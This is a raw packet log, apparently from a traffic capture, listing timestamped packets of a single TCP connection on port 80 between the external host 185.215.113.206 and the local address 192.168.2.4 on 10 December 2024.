Dec 10, 2024 00:42:27.596321106 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.596359968 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.597143888 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.597186089 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.597213984 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.597250938 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.597882986 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.597923994 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.597981930 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.598021984 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.598716021 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.598773003 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.598828077 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.598870993 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.599576950 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.599625111 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.599687099 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.599733114 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.600378036 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.600428104 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.600522995 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.600572109 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.601205111 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.601255894 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.601303101 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.601344109 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.602027893 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.602081060 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.602119923 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.602160931 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.602848053 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.602868080 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.602897882 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.602919102 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.698631048 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.698643923 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.698715925 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.698930979 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.698971987 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.699115038 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.699162960 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.699944019 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.699985027 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.700119019 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.700160027 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.700161934 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.700172901 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.700192928 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.700216055 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.700558901 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.700603008 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.700627089 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.700665951 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.701390982 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.701436996 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.701445103 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.701486111 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.702218056 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.702267885 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.702341080 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.702390909 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.703051090 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.703097105 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.703118086 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.703156948 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.703885078 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.703937054 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.703947067 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.703984022 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.704699993 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.704745054 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.704796076 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.704845905 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.705518961 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.705566883 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.705600023 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.705643892 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.706338882 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.706382990 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.706413984 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.706459045 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.707184076 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.707243919 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.707273006 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.707317114 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.708018064 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.708060980 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.708070040 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.708106995 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.708847046 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.708889961 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.708900928 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.708937883 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.709716082 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.709762096 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.709789038 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.709831953 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.710541010 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.710587025 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.710649967 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.710695028 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.711319923 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.711363077 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.711417913 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.711462975 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.712168932 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.712215900 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.712232113 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.712269068 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.713016987 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.713063955 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.713068008 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.713104963 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.713814974 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.713859081 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.713886976 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.713932991 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.713942051 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.714612007 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.714658022 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.714687109 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.714725971 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.715482950 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.715529919 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.715559006 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.715603113 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.716263056 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.716305971 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.771508932 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.771521091 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.771574974 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.771707058 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.771750927 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.771876097 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.771918058 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.772543907 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.772584915 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.772670984 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.772871971 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.773371935 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.773425102 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.773480892 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.773519039 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.774194956 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.774244070 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.774262905 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.774302006 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.775012970 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.775063038 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.775228024 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.775274038 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.775846004 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.775892019 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.775911093 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.775954962 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.776681900 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.776732922 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.776787043 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.776830912 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.777488947 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.777533054 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.777631044 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.777671099 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.778330088 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.778379917 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.778455973 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.778493881 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.779350996 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.779397011 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.779557943 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.779599905 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.780487061 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.780503988 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.780534029 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.780549049 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.780999899 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.781047106 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.781126976 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.781208992 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.781672955 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.781719923 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.781779051 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.781819105 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.782469988 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.782516956 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.782573938 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.782608986 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.783299923 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.783353090 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.783411980 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.783452988 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.784125090 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.784168005 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.784229994 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.784264088 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.784970999 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.785022020 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.785054922 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.785093069 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.785794020 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.785835981 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.785955906 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.785996914 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.786618948 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.786659002 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.786717892 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.786757946 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.787445068 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.787481070 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.787555933 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.787594080 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.788276911 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.788324118 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.788410902 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.788454056 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.789097071 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.789138079 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.789191008 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.789232016 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.789922953 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.789966106 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.790033102 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.790159941 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.790747881 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.790791988 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.790817976 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.790858984 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.791603088 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.791667938 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.791702032 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.791744947 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.792422056 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.792467117 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.792599916 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.792640924 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.793236971 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.793277979 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.793350935 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.793390989 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.794056892 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.794099092 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.794168949 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.794217110 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.794910908 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.795002937 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.795017004 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.795068026 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.889929056 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.889986992 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.890048981 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.890090942 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.890355110 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.890403986 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.890481949 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.890525103 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.891155005 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.891202927 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.891295910 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.891335964 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.891952038 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.891995907 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.892024994 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.892096996 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.892776966 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.892822027 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.892829895 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.892863035 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.893604040 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.893659115 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.893718958 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.893758059 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.894478083 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.894530058 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.894556046 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.894593954 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.895273924 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.895330906 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.895330906 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.895365000 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.896116972 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.896167040 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.896226883 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.896271944 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.897166967 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.897214890 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.897268057 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.897313118 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.897773027 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.897819042 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.897831917 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.897871017 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.898616076 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.898658991 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.898772001 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.898818970 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.899811029 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.899857998 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.899920940 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.899965048 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.900259018 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.900305986 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.900362968 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.900408983 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.901070118 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.901122093 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.901201010 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.901247025 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.901884079 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.901928902 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.902009010 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.902054071 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.902769089 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.902817011 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.902894974 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.902940989 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.903558969 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.903613091 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.903645039 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.903688908 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.904388905 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.904439926 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.904508114 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.904551029 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.905236959 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.905286074 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.905340910 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.905390024 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.906042099 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.906086922 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.906194925 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.906241894 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.906861067 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.906909943 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.906969070 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.907015085 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.907722950 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.907768965 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.907834053 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:27.907881975 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:27.908487082 CET	80	49749	185.215.113.206	192.168.2.4
